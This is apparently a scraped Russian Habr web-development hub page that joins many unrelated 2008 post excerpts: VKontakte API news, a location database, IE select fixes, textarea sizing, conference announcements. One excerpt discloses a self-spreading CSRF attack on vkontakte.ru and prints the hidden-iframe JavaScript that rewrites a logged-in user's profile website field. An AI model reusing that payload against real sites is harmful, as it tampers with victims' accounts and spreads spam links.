Веб-разработка *

Эта небольшая статья поможет новичкам (и не только) оценить удобство собственного сайта и укажет основные недочёты, присущие многим сайтам. Ваши пользователи скажут вам спасибо =)

Вчера (или даже еще раньше) неожиданно (хотя бы для меня) мне пришла ссылка в твиттер. Пройдя по ней, я удивился — вместо того, чтобы править дурацкий баг с черным списком во мнениях, Павел Дуров сотоварищи решили сделать платформу.
Итак, встречайте — Flash приложения и API ВКонтакте!

Хочу поделиться базой стран, регионов и городов на русском языке. Возможно, кому-то пригодиться в своих проектах. В базе 106 стран, 922 региона и 10969 городов!

Если кто не понял о чем речь, то вспомните, например, как на ВКонтакте указывается город: выбирается страна -> подгружается список регионов -> выбирается регион -> подгружается список городов

Представьте такую ситуацию.

Приходите вы на работу, садитесь проверить почту, рассчитывая увидеть ответ от партнёра, немного спама, а вместо этого видите вот такое: Входящие (164 532).

Многие проекты на данный момент используют информацию о местонахождении своих клиентов. К таким относятся интернет-магазины, сайты знакомств, банковские операционные ресурсы и прочее. Именно об элементе указания такого рода информации и будет данная статья: Ext.ux.locationSelect реализованный в поле фреймворка ExtJS 2.
Маленькая демка поможет ответить на вопрос о необходимости вчитываться в дальнейшее.

Проблема

Стандартный select, оказавшись под непрозрачным дивом остается полностью виден в IE. Из-за этой его особенности, выпадающие меню, всплывающие окошки и прочие элементы, связанные с позиционированием дивов могут выглядеть крайне неаккуратно.

Решения

Есть несколько способов решения этой проблемы. Перечислю их от простого к сложному:

1. прячем select
2. iframe поверх select'а
3. собственные select'ы

Задача:
Сделать поле ввода комментариев (textarea) на форме так, чтобы его размер (высота) изменялась согласно количеству (строк) текста.
Пользователь может ввести пару слов в одну строку или вставить табличку высотой двадцать строк из экселя — поле ввода должно автоматически увеличиться/уменьшиться.
Длина строк различна (форма резиновая и зависит от размера окна браузера), строки могут переноситься как по \r\n, так и просто, если не вмещаются по ширине.
В принципе, нужна формула подсчёта количества строк текста, чтобы менять атрибут rows у textarea.

Javascript приветствуется. Если решение возможно только средствами html/css, то ещё лучше.

Решения:

Web Developer Toolbar — известный набор утилит для веб-разработчика, который в сочетании с Firebug составляет незаменимый инструментарий, без которого я не мыслю веб-разработки.

Из основных изменений:

— Поддержка Firefox 3
— Оптимизация кода
— Исправления ошибок

Для тех, кто любит держать перед глазами схемы с базовыми классами языка — этот постер будет самое то. Распечатать его правда будет довольно сложно так как он здоровый, а не мини-подсказка.
JPG version [5.8MB]
PNG version [6.5MB]
TIF Version [19.9 MB]

ЗЫ. Картинку preview здесь не публикую, так как в размере, до которого уменьшит хабр эту картинку будет ничего не видно, цветовые пятна разве что.

Как дать пользователю возможность проверить свой пароль на строгость и взломоустойчивость?

Такой вопрос возникает в последнее время всё чаще, потому нарыл немного вариантов решения вопроса.

 

Со странички wordpress.org/about зашел на сайт организации The Web Standards Project, которая борется за соблюдение стандартов W3C. Посмотрел, что они пишут у себя на сайте, пролистал до футера, там ссылка на валидацию — кликнул ради интереса. XHTML 1.0 Strict — полностью валидный, а для CSS валидатор выдает вот такое сообщение:



Куда катится мир?

В свете последних событий нарыл такую штуку, решил поделиться с сообществом.
Оригинальная статья на английском, поэтому здесь — только вольный перевод.

Значит так. Что заиметь у себя одновременно и графическую, и звуковую капчу, нужно для начала всё это дело скачать. Потом скопировать себе в удобное место и читать дальше. Кстати, лицензия у этой радости — BSD. Кто понимает, тот выбирает =).

19 марта, 19:00-22:00, встреча Программного комитета РИТ-2008. Пройдет в Экстрополисе (Москва), зал Вестник-1.

Задача членов Программного комитета к этому времени собрать как минимум заявки на доклады (названия тем), как максимум — тезисы докладов. Заявки без тезисов принимаем только от проверенных докладчиков ;-)

Встреча открыта — приходите все желающие, мы можем решить там любые вопросы!

Привет, Хабр! Пообщавшись с Сергеем Якубовским, руководителем проекта «рейтинг студий», удалось выяснить ряд интересных подробностей про планы группы, думаю, это любопытно:

Сергей рассказал, что после окончания рейтинга “TOP-100 ведущих веб-студий Рунета 2008” и публикации его результатов, проект будет трансформирован в отраслевое СМИ.

Студии, прошедшие предварительную регистрацию в рамках проекта, получат возможность публиковать на ресурсе свои новые работы, новости, материалы. Так же на основе зарегистрировавшихся компаний будет создана база профилей студий с расширенной информацией.

Напомним, что этап предварительной регистрации заканчивается 14 марта. На данный момент регистрации прошло около 500 веб-студий.

Группа планирует реализовать в рамках проекта элементы B2B сервисов и позволить потенциальным заказчикам публиковать информацию о тендерах, в том числе с фильтрацией их видимости (например, тендер, доступный только студиям из TOP-100, или только студиям из определенного региона).

Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:

<script>
function doit() {
  var html;
  html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
  window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле «Веб-сайт» станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе… И т д.

Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.

Отписал в тех-поддержку, где столкнулся с «Это не баг!», «Не кликайте по подозрительным ссылкам!» и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом «вирусе», который живет целиком в соц-сети =)

 

Вы пользуетесь Sisoft Sandra или аналогичными программами?
Давайте потратим 15 минут и напишем скелет своей программы аналогичного функционала.

Архитектор последних версий браузера Internet Explorer, один из разработчиков стандарта CSS, легендарный Александр Могилевский, выступит с докладом на конференции «РИТ — 2008»!

В течение часового выступления гостя российским веб-разработчикам представится уникальная возможность увидеть новейшие возможности обозревателя Microsoft Internet Explorer 8, который был представлен пару дней назад на конференции MIX'08 в Лас-Вегасе.

Это будет первая презентация новой версии самого популярного браузера в России. Также у вас появится возможность задать любые вопросы человеку, который знает, какими инструментами для работы в интернете мы будем пользоваться в будущем.

В комментариях к этому посту можно задать вопросы Алексу, лучшие из которых я обещаю задать во время интервью.

Для тех, кто не помнит, UA Web — это конференция посвященная веб-разработке. Мы рассчитываем собрать лучших украинских профессионалов в этой сфере вместе и познакомить друг с другом. В программе конференции такие темы как серверное программирование, клиентское программирование, базы данных, инвестиции, аутсорсинг, фриланс, методики разработки и всё, всё, всё.

Все доклады разбиты на три секции:
+ Клиент («JavaScript и доступность web-приложений», «Вёрстка независимыми блоками», «Микроформаты: здесь и сейчас», «Профессиональный верстальщик. Кто он?», «С ножом против паровоза. Нарезка и оптимизация графики для вёрстки», «SilverLight 2.0: первое знакомство», «Комфортная разработка сайтов на XSL»);

+ Серверное программирование и базы данных («Веб-разработка на django», «Многоязычные сайты», «Репликация данных в PostgreSQL», «Рейтинг Bigmir.net, архитектура, перспективы»). Также в этой секции Вы сможете задать свои вопросы разработчику веб-сервера nginx Игорю Сысоеву;

+ Бизнес, фриланс («Социальные сети, перспективы развития и способы монетизации», «Тестирование и оценка времени», «Как стать успешным фрилансером», «Привлечение капитала в Start-Up», «Управление проектами: требования, планирование, контроль», «Зарплаты ИТ-специалистов: анализ developers.org.ua», «Бизнес процессы в веб-разработке»);

Полная программа доступна на сайте конференции:
uaweb.in.ua/news/3971.html

UA Web-2008 состоится 27-28 марта в центре Киева. Дополнительная информация — на сайте проекта:
uaweb.in.ua

Первая украинская конференция веб-разработчиков. Будьмо!